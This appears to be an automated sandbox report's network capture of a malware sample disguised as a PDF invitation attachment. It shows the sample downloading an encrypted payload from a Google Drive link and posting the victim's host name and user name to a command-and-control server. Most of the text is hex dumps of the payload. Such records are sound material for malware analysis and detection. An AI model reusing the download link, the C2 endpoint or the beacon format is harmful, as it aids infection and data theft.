                      TimestampkBytes transferredDirectionData
                      Nov 30, 2021 15:34:09.490067959 CET1458OUTPOST /tickets.php?id=156 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 63.250.34.171
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 413CA904
                      Content-Length: 163
                      Connection: close
                      Nov 30, 2021 15:34:09.809978008 CET1458OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 33 00 35 00 33 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                      Data Ascii: (ckav.ruhardz035347DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Nov 30, 2021 15:34:10.682764053 CET1459INHTTP/1.1 403 Forbidden
                      Date: Tue, 30 Nov 2021 14:34:09 GMT
                      Server: Apache/2.4.38 (Debian)
                      Content-Length: 287
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.349746216.58.209.46443C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe
                      TimestampkBytes transferredDirectionData
                      2021-11-30 14:33:58 UTC0OUTGET /uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: drive.google.com
                      Cache-Control: no-cache
                      2021-11-30 14:33:58 UTC0INHTTP/1.1 302 Moved Temporarily
                      Content-Type: text/html; charset=UTF-8
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 30 Nov 2021 14:33:58 GMT
                      Location: https://doc-0g-14-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470gcqqh0o2bl4lp5jq2phtn0nr/1638282825000/17938877548982121299/*/1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ?e=download
                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                      Content-Security-Policy: script-src 'nonce-U9VGK5If/s7UCuSuXIrZdg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                      Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                      Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                      X-Content-Type-Options: nosniff
                      X-Frame-Options: SAMEORIGIN
                      X-XSS-Protection: 1; mode=block
                      Server: GSE
                      Set-Cookie: NID=511=scNkK5sekcKY6fTTT8UNmQXc3WhRBqoTwCRVzIUthDcWmZsn_-wrhlkBMD0FaRQ4Y1Ez3PoZ9AG4iiLkyL_X1dKFhBP44us_VAm3rte3t0IIEtsf_NRHxgvLeeZuxLN4FDICZj_ZivBvjFKzPV_UoaHhGPhb_RBrBtzpisGKe78; expires=Wed, 01-Jun-2022 14:33:58 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                      Accept-Ranges: none
                      Vary: Accept-Encoding
                      Connection: close
                      Transfer-Encoding: chunked
                      2021-11-30 14:33:58 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 67 2d 31 34 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 69 6f 6c 38
                      Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0g-14-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8
                      2021-11-30 14:33:58 UTC2INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.349747216.58.208.129443C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe
                      TimestampkBytes transferredDirectionData
                      2021-11-30 14:33:59 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470gcqqh0o2bl4lp5jq2phtn0nr/1638282825000/17938877548982121299/*/1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ?e=download HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Cache-Control: no-cache
                      Host: doc-0g-14-docs.googleusercontent.com
                      Connection: Keep-Alive
                      2021-11-30 14:33:59 UTC2INHTTP/1.1 200 OK
                      X-GUploader-UploadID: ADPycdu4TO7yQSLDVP5u3ahzVOQR3a3byAX0LOZRaxBl2IDJ5q4v57A9VBzgTLRQWx_0vV6BjiPDSYEqA8O--HgxMdqfEKSqnA
                      Access-Control-Allow-Origin: *
                      Access-Control-Allow-Credentials: false
                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                      Access-Control-Allow-Methods: GET,OPTIONS
                      Content-Type: application/octet-stream
                      Content-Disposition: attachment;filename="Press_KWgTPXvmpV107.bin";filename*=UTF-8''Press_KWgTPXvmpV107.bin
                      Content-Length: 106560
                      Date: Tue, 30 Nov 2021 14:33:59 GMT
                      Expires: Tue, 30 Nov 2021 14:33:59 GMT
                      Cache-Control: private, max-age=0
                      X-Goog-Hash: crc32c=SX2f0w==
                      Server: UploadServer
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                      Connection: close
                      2021-11-30 14:33:59 UTC6INData Raw: 43 c9 47 aa 99 5d d1 8d a6 a0 0c b7 b8 32 00 75 72 06 58 6b fe 4c a4 9e 01 52 4b 0a 4a 8c 3d 57 ba 44 c4 75 fe 8b f8 99 19 fa 7c 19 9b 33 d8 5c 76 e3 e5 bb d4 55 12 52 00 4f 15 2f 6c 27 57 58 16 cd be 9a dc c3 3d 5d ad 66 21 3d d1 6d 10 5d a1 cf eb 83 55 94 57 ba c0 42 97 5e cb 70 8d 13 fe c2 0c 04 6e 8c 5d 59 0f b2 0d d2 50 2d f3 8c 80 b4 6b 9c 12 d3 bd 21 c1 17 6d 46 4c dd 02 25 5c 6e 7b c0 9d ce 36 f6 53 3c d2 e6 03 80 24 32 f9 2a 4f 35 87 80 fe 12 87 ee 44 27 45 a8 b6 ea 4f 94 67 75 c6 a4 86 40 51 5e a4 85 0f 01 b6 2f d0 f9 77 71 9b 67 b2 fc 80 0e 44 c2 b2 78 be ee c2 d3 9d 55 ba 04 34 77 82 f5 9b 05 a1 df ed d5 02 3e a9 4e 5f 75 08 bd c0 ef 17 90 36 b0 da 0e a6 d8 71 cf cd ce 8d ad 69 1a 84 98 ff 32 ad ce b4 91 cc f8 9a 89 a2 f4 d9 9f 8e af 7d 04 80
                      Data Ascii: CG]2urXkLRKJ=WDu|3\vURO/l'WX=]f!=m]UWB^pn]YP-k!mFL%\n{6S<$2*O5D'EOgu@Q^/wqgDxU4w>N_u6qi2}
                      2021-11-30 14:33:59 UTC9INData Raw: 0f c2 8b d5 0c 0e e6 b4 be 86 5b 4c 0d 4e e5 7e 2e e6 33 8f 87 ad 75 44 73 07 c1 cf a8 52 0b 7f 69 f5 41 d5 8a 8b c2 3f 07 f7 b7 92 ee 69 f4 0b 1e d4 45 be 06 cc ae ff ae f6 3e 54 12 42 ee 12 0c a2 04 5d ed ee 49 50 84 6d 57 cc 2f cf ea a4 cc 70 46 25 02 85 70 cb ca f6 22 b7 e6 f4 3c 8c 4a 41 b5 b3 a0 f5 b0 1b d6 d9 75 b2 58 a0 e7 fd d0 e5 04 67 11 54 5c eb e3 ca b2 aa 43 9e 61 8a d1 d5 5f b5 7b 16 60 90 23 e9 a0 57 a4 1d b5 c1 79 fd 12 fa c8 58 82 4a 69 74 47 37 dd ba 73 57 dc d3 b6 03 51 81 9d 52 a4 41 e5 eb 7e 49 fb 01 22 96 c8 3e fd fb 84 5d 8f 39 af 5f 90 e0 96 1c 42 be f7 7b 96 f7 03 4c d6 d4 a5 58 d1 b4 06 cc 21 80 9e af 1b 9e 90 30 9b d5 9f 54 99 9a aa e6 14 8d 32 a8 4d d4 88 b2 65 d3 50 16 75 88 84 b4 6b ea 0a 58 3b 2d c5 17 6d 7d 44 ab 06 0e aa
                      Data Ascii: [LN~.3uDsRiA?iE>TB]IPmW/pF%p"<JAuXgT\Ca_{`#WyXJitG7sWQRA~I">]9_B{LX!0T2MePukX;-m}D
                      2021-11-30 14:33:59 UTC13INData Raw: 15 0b d4 cb 74 5d 46 41 0c 02 2f c6 77 27 bf 89 14 70 ee fa 17 83 81 0f 10 ec f0 56 e1 92 9e 4b 22 2e cc 6d 7d b2 9b 61 1b 7f b4 ef 25 ab 29 7b 60 21 ce e0 67 04 6c 87 14 b0 61 55 0d 5c 6a c6 b6 da e7 38 a2 f0 9e 01 3d 7f 97 c0 3e 09 8c 82 50 09 45 68 d4 81 66 e6 63 16 a1 5d d9 c8 20 1f d3 46 14 d6 2b 55 26 11 37 e8 43 7b d3 27 52 b9 7d a0 20 20 8c a2 28 72 64 ad 8c ee 8a ef 11 aa ad 99 a3 46 fb 68 5c f3 4c 65 01 1e 9b 57 f6 4b c9 a6 41 51 54 d0 c8 06 c1 44 fc 9f 9f b9 4c 79 e3 9c cf e8 ca 1f d3 58 10 7e 6c 06 85 2f 08 5c 4c 9c 59 ec 56 e9 bc 8f c1 3c 12 dd 29 5a 00 35 8f 0d a3 6a 81 90 01 9b 63 14 cb df 9c e3 1c c9 cc 6e 23 38 0e 87 35 7d 6e 64 30 7c 68 a8 52 64 f4 0a 68 38 e3 0c 49 23 8a 6c b0 89 84 b9 c7 f5 98 c3 dc fe 39 e5 2e df 58 e0 c6 b9 3d 3e 18
                      Data Ascii: t]FA/w'pVK".m}a%){`!glaU\j8=>PEhfc] F+U&7C{'R} (rdFh\LeWKAQTDLyX~l/\LYV<)Z5jcn#85}nd0|hRdh8I#l9.X=>
                      2021-11-30 14:33:59 UTC17INData Raw: 38 83 36 b7 59 17 1b 19 8f 93 74 d1 ac d8 3d 63 4d 23 7d cd bc b1 54 c5 58 ef d3 f3 53 b6 34 41 f1 29 e8 91 b8 bf d9 95 15 0e 66 c5 b5 b5 44 57 3b f4 1f 30 43 a3 16 a1 ec 57 20 e6 8b dd bd 24 d6 1a 95 0a ca 4c a8 98 3c 7d bb a4 98 2d d8 88 ab 36 df 67 05 c5 d9 1d 19 ab 4a bf 11 fd 2f e9 48 fa 93 5d a1 f7 a3 3b 1a 2e 7d 7b 3a 86 cc 83 dc c6 c1 6f 90 1c ff 47 87 5c 27 e6 52 a3 0e 07 50 62 dc 5c bc b8 07 e4 d7 4f 02 db 35 75 43 07 07 05 66 8c 71 f8 9c 04 52 72 6b 84 53 93 7b 95 fa 46 e7 67 9c ef e4 80 bc ce 83 13 d6 71 e4 97 4d 39 98 c6 99 73 42 e7 0a 40 ff 9e 15 45 72 d6 32 bf ca 70 12 0c ca 29 b5 64 50 f4 4a b5 61 7e 08 41 28 cf 15 f8 63 12 12 8c 4e c4 54 c4 fa 96 6d ad d4 d6 4a be 46 11 5b 4f 33 21 7c 7b 12 d0 25 4b f1 78 8b 5a 99 db c4 f2 fd f2 5f 96 ec
                      Data Ascii: 86Yt=cM#}TXS4A)fDW;0CW $L<}-6gJ/H];.}{:oG\'RPb\O5uCfqRrkS{FgqM9sB@Er2p)dPJa~A(cNTmJF[O3!|{%KxZ_
                      2021-11-30 14:33:59 UTC18INData Raw: e8 78 50 c0 31 c1 e8 18 4e ea a9 4a da 27 61 96 a6 f5 2b 7e 3b 9a 16 cd aa ce 5e 05 4a 19 1c 93 12 9d b3 c8 21 e6 6b e5 5a 24 c6 5b 41 1b 3d 40 1c 63 16 87 1e 21 df 85 a5 4b 4e bc 8a 7d e3 1a eb c0 66 57 a1 5b f1 bb 9b 4d 0d b2 06 99 f0 1a 54 6b 43 33 8d 62 d9 dc e9 29 9b b6 66 83 ea bf 27 c6 50 5b ec dc a4 21 d3 43 e3 95 fc ae a3 1d 65 12 8a ea ee ab d7 2e be 31 62 e5 38 b7 d8 87 96 43 ae 58 04 b1 f0 f3 fd 0b fd 1d c9 91 ff 5a a8 60 a8 4c 51 f0 d6 a4 28 99 1f b5 66 59 80 1d 21 41 61 53 2a 8c 7c a3 e9 fc df 32 57 1e 89 40 15 96 93 4f 88 f0 c8 a9 c7 86 11 5e 6c 5d c2 ff aa d6 e8 74 6b a0 8d f5 dc 9b ae bb 4b 9a 53 d6 56 a0 98 cf 59 eb 54 0b 19 44 e0 c6 d4 60 5d 7b e7 a3 33 62 00 0d ab 5e 1f e5 64 91 1f 42 0a 5f c0 16 0f f1 52 2c 76 cc 71 3a 77 35 31 17 64
                      Data Ascii: xP1NJ'a+~;^J!kZ$[A=@c!KN}fW[MTkC3b)f'P[!Ce.1b8CXZ`LQ(fY!AaS*|2W@O^l]tkKSVYTD`]{3b^dB_R,vq:w51d
                      2021-11-30 14:33:59 UTC19INData Raw: c7 43 69 8f db b6 e6 8a 65 de 36 d3 5e 6b c1 2e f4 53 b7 ad 1b 34 4f fd 31 c2 f1 f7 02 fa 52 5b e4 37 51 6a ef 57 fb 7e e8 e3 6e 24 b1 38 76 c2 92 3c 18 57 b6 57 d2 9f 82 61 09 77 31 38 55 c3 73 b4 ae b7 dd f7 00 8d c0 c7 75 c0 0a af 9a f9 dd c9 c1 3d c6 5d 89 cb b5 c9 de b8 e7 15 42 82 cb e5 f8 ae e7 c2 80 1d 5c ba e7 1e c7 91 81 2d 03 a1 cc 73 b2 8c 11 35 3a 33 1a 27 dc ff 73 24 47 48 f0 35 2b c7 3a a6 b4 d4 81 82 88 cf f2 80 e6 e9 82 e8 22 f5 26 3b 48 af 47 9e 81 8e 38 2d 2c 24 05 c8 db ee 0f 65 54 e5 36 f0 2e f8 2b 8a fb c0 ea 3e 93 f3 81 70 45 f9 fb 92 91 a6 68 af 58 fe 2a db 91 48 4e 9b e2 39 65 aa cf 04 18 bd 12 28 d5 5c 88 10 5d 1a 0f 00 86 bd c4 4d ba 80 1b fd 5e 9b 8f f8 1f 01 b7 04 ec 6b 8c 5d 59 8c 76 1d 8f 93 78 78 60 d1 e2 3c af e4 85 eb 49
                      Data Ascii: Cie6^k.S4O1R[7QjW~n$8v<WWaw18Usu=]B\-s5:3's$GH5+:"&;HG8-,$eT6.+>pEhX*HN9e(\]M^k]Yvxx`<I
                      2021-11-30 14:33:59 UTC20INData Raw: 4e 31 95 14 2b 6c 3f c0 07 31 e6 02 13 25 35 58 3a 72 44 50 d2 bc 9f 20 d6 f3 35 15 d4 9e c2 f6 7a 8b 2f c3 be 3d 97 e1 1a ec e5 84 b9 64 e9 50 f1 25 60 df f5 a2 f8 2c d3 2f 9a 37 c4 b7 ab e2 fc 5c 99 57 6f 76 4f cd c6 3b a2 17 5c c8 83 f5 66 bb 2e eb 22 f4 2d 78 28 a3 e6 ad 50 26 3e 0d b4 d1 be 11 fd 9f c5 e0 af aa 49 fa 81 93 3b 1a 52 67 7b 3a 54 07 c0 47 8c cf 75 b8 d5 fc 24 5e 3b 34 15 32 e8 b8 4e f9 40 4a 26 8f 19 66 58 cc 39 88 4d 6d 94 99 b6 c2 de 44 7d bd db 6b 99 fc be e5 5a 27 b4 73 14 2a 96 f2 73 18 e4 e4 0a 38 60 32 94 cd 81 9f 76 a5 c5 7b c6 13 de ff 74 b5 6c fe 82 15 39 3d 9f 98 60 a1 2a d3 14 46 1d e7 07 ff 50 76 1f 82 92 3b 81 88 f5 7c 6b 1b a9 b6 24 f7 37 6e be c5 66 9c 39 2b a3 46 ca 46 e1 ce 9f 04 e2 41 03 58 e1 24 0d fa 90 ab f5 31 17
                      Data Ascii: N1+l?1%5X:rDP 5z/=dP%`,/7\WovO;\f."-x(P&>I;Rg{:TGu$^;42N@J&fX9MmD}kZ's*s8`2v{tl9=`*FPv;|k$7nf9+FFAX$1
                      2021-11-30 14:33:59 UTC22INData Raw: 98 64 4f a6 90 c6 31 e3 5e 25 1a 8b 66 44 24 91 8f ed c8 40 75 d1 8c d4 1b 93 94 c8 35 28 06 b2 b4 59 ea c1 ec 61 b9 95 ca fe 5b de c1 02 c7 7c 35 28 e5 17 b3 43 54 77 dd 25 53 6a 4d f7 77 f8 1e 25 40 bf b7 0f 87 88 4d 46 30 44 5e 3d bc 4f 24 bf f4 87 97 e9 b4 3b 1e f6 20 78 20 66 47 61 ec 35 d4 e1 04 aa e9 a6 70 55 d1 16 f1 c5 b1 50 95 25 6e 8a 05 17 57 a5 47 de 68 3f 5e 3f b5 f3 e2 89 a0 c8 d2 b0 57 b1 dd e1 1d 76 9f c9 7b cc 1a b6 11 a4 e0 6f 03 6d af 82 51 88 20 82 7a cb 09 b0 f1 23 1e c1 14 1d aa cd 6c 0f ac 32 9b cc 6d ba c8 14 90 dc 4c 1b dc 20 b5 56 2b a0 aa 3e d1 e7 f6 ad 22 e9 a5 65 bf 80 fa a4 da be 1a 11 99 b3 64 72 5d c7 1c 24 5d 3f c5 8d b6 64 b7 fa 85 9f bf a8 fc a3 68 f9 8e 77 74 cf db c3 5b bc ed 3d 42 22 b0 8e 68 74 50 da a0 ed cb 9f 36
                      Data Ascii: dO1^%fD$@u5(Ya[|5(CTw%SjMw%@MF0D^=O$; x fGa5pUP%nWGh?^?Wv{omQ z#l2mL V+>"edr]$]?dhwt[=B"htP6
                      2021-11-30 14:33:59 UTC23INData Raw: bc ca 7b e2 79 cb 8f 3c 02 cf b9 9e 49 dd e5 6e 14 82 38 76 10 ee 71 6f e6 a8 ef ea 12 1c af 90 cc 33 08 75 6a 60 28 8d b9 9f dd 81 32 96 7e 50 c0 78 bb 59 68 0f df 33 e7 75 56 1c c9 68 73 a2 21 fb b9 61 75 41 39 ba 2b 63 b5 2d 2d e9 95 55 13 6c 2b 5e 0c 34 0c db cb 0f 3f 0d 84 36 ff f1 07 03 ec e7 3d 5f bd 6b b7 cd f6 45 b6 c0 f3 8e 8d f2 61 f1 fb 2d e1 ea e4 24 e2 4c 6d e4 97 dc 87 21 2f 38 33 b7 a4 5c 63 ba a8 3f b8 47 80 fd dd 4e b9 0e 9e fb d0 60 cd ab 1d c8 a9 ba f9 e6 4a 69 76 35 e1 4b 7b 00 14 e7 55 eb 0b c4 d1 ef d7 2b 1b a9 56 99 72 b6 de 7a da 84 e6 30 68 47 79 11 a1 ce ef 2a 03 0f 8a 70 db fb fd cf 0c 04 e5 74 04 00 48 c6 50 ba c8 7c b2 8c d7 5c 9a 90 12 d3 36 f9 98 4e e8 9d c8 c6 55 cd aa 7b c1 ce ce f1 cf d3 82 8e d3 aa 97 f8 fd 56 ae 72 a7
                      Data Ascii: {y<In8vqo3uj`(2~PxYh3uVhs!auA9+c--Ul+^4?6=_kEa-$Lm!/83\c?GN`Jiv5K{U+Vrz0hGy*ptHP|\6NU{Vr
                      2021-11-30 14:33:59 UTC24INData Raw: 36 34 e6 ed 54 46 87 2f e8 b7 e8 b9 b4 8e 3c 98 1c 78 92 9c 40 00 dc 49 0d f6 3b 0b d3 fa d9 4c c1 3c e6 8c 6b a2 ab 44 46 98 46 60 2c 5e c0 2b 95 f3 c9 83 4a 82 44 d1 39 8b 26 72 fe 98 df c3 05 4f 2a 38 0d e4 e6 be 11 03 d2 25 67 b1 d6 72 a6 48 3d c5 c1 87 dc da 98 1c aa c8 6f ce c1 ff c5 5a 5c b8 77 20 bd ee 6b 28 ac 3d ee 97 62 b3 70 b1 b8 79 d7 12 88 d8 3b 14 f4 27 7d 21 90 46 9a d3 c9 2f a5 dd 87 d2 53 3e f8 87 58 f7 18 5b 64 e3 90 87 6e b3 25 e3 2d 4d a0 ca 6d 6f f2 39 bb 6f 79 64 1d 7b 67 6d 02 52 62 25 9b 6a 66 b1 90 8d 6d a6 3f ec 12 0d 3c 72 80 0e 0c 1e 86 f8 d7 fb be 73 d4 31 13 68 d2 ca 4f 91 be a2 9a d2 49 f4 be d5 38 74 a1 56 12 05 0c 94 c9 21 f8 a3 62 28 a1 4e 4d e5 f6 41 3a 06 47 22 5e 49 0a f1 ed c8 8f b3 f2 b1 31 1c 25 19 43 a9 d0 c8 f0
                      Data Ascii: 64TF/<x@I;L<kDFF`,^+JD9&rO*8%grH=oZ\w k(=bpy;'}!F/S>X[dn%-Mmo9oyd{gmRb%jfm?<rs1hOI8tV!b(NMA:G"^I1%C
                      2021-11-30 14:33:59 UTC26INData Raw: c8 9c 4d 1a 9e 1a f0 3e 52 0f 9f 72 81 b6 a0 4c 4a 94 3d 4d 21 8d 2e 51 40 be f6 f1 fd a9 36 59 0f da 57 5c 7b 13 df 82 ea 3c d0 1f b3 1c 4b 06 f4 fc 22 bc 1c 47 64 dc 9b 67 f2 85 95 42 0b 9c 79 9f d6 bb 61 44 e8 cc 64 83 d0 e0 51 db d4 54 74 5c 68 f4 fe 7e 84 a1 75 ad cd 7a 5a e3 51 dc 5d 0a 3f 13 eb e2 89 7b 6d 4a e0 01 3c 1b e1 cf e5 7c 39 88 47 2f 8d 27 f9 f8 e8 34 fb ac 99 dd 6f 72 cc 4e 13 e0 a4 f8 37 e8 1c 24 b1 f1 e9 e7 73 12 fe b8 95 e6 5f 95 86 af 57 f3 70 6a e3 1c c3 78 1e 56 08 94 cf 82 a2 2d 84 fa a5 c4 7a 78 60 c6 63 26 8f 98 1a f9 fe 7a 93 1d 82 91 7a 5a dc 68 d3 74 af 0e 20 bb cd 70 da 3f 07 86 75 22 27 e7 1c a0 43 bb 3f c7 b0 58 a5 5e 90 60 ae a7 3f 33 68 87 2d 30 8d 08 25 ec e6 f4 71 62 b0 9d 52 a3 2a 91 0d 81 1b a0 d5 73 43 6a 4e d5 a8
                      Data Ascii: M>RrLJ=M!.Q@6YW\{<K"GdgByaDdQTt\h~uzZQ]?{mJ<|9G/'4orN7$s_WpjxV-zx`c&zzZht p?u"'C?X^`?3h-0%qbR*sCjN
                      2021-11-30 14:33:59 UTC27INData Raw: c1 93 0b 4e d5 58 3c d4 c9 41 4f d5 ec dc c9 c9 a9 9a 0b 24 75 4a 8f 1d ba f5 93 d1 e6 80 fa 0b b5 9c 8b 08 15 63 07 80 3e 62 78 e4 82 91 6c 83 67 97 dd 46 ef 92 28 91 0b 54 0c 3c 2b 75 9d 2e 8b 5f 71 a4 a1 6f eb 2a c9 4c 7f 45 17 8e de d0 45 a9 1e a0 3b 57 9b aa ad 4c 48 87 2d a1 87 b4 23 3e e4 17 04 9a 7e 23 d9 c1 f8 ba a0 ab 3f 0c 30 ca 89 c0 a0 29 b8 61 28 31 fe 7c 7d e1 f9 f5 a1 1a 65 6c 8c 17 23 86 64 93 dd fc 83 ac 51 98 bf 75 c1 a5 ef 27 90 6e 35 76 5e 98 de 44 9b f8 8b c9 30 14 0e 18 68 06 ec d3 bd 47 a1 be 88 7a cb e5 02 2d 41 92 64 74 a6 f0 4d 86 97 ac 74 ad d7 0b 51 36 5f 47 58 51 70 92 41 d6 4e be dd 02 76 ba 4a 0b 31 62 f1 cf 62 f7 72 a7 93 99 c9 74 5b 90 59 5c ba a2 b9 71 55 34 7c 9b c7 e0 ca 51 d8 c7 e3 52 78 bf 96 6a c5 26 df b1 75 b4 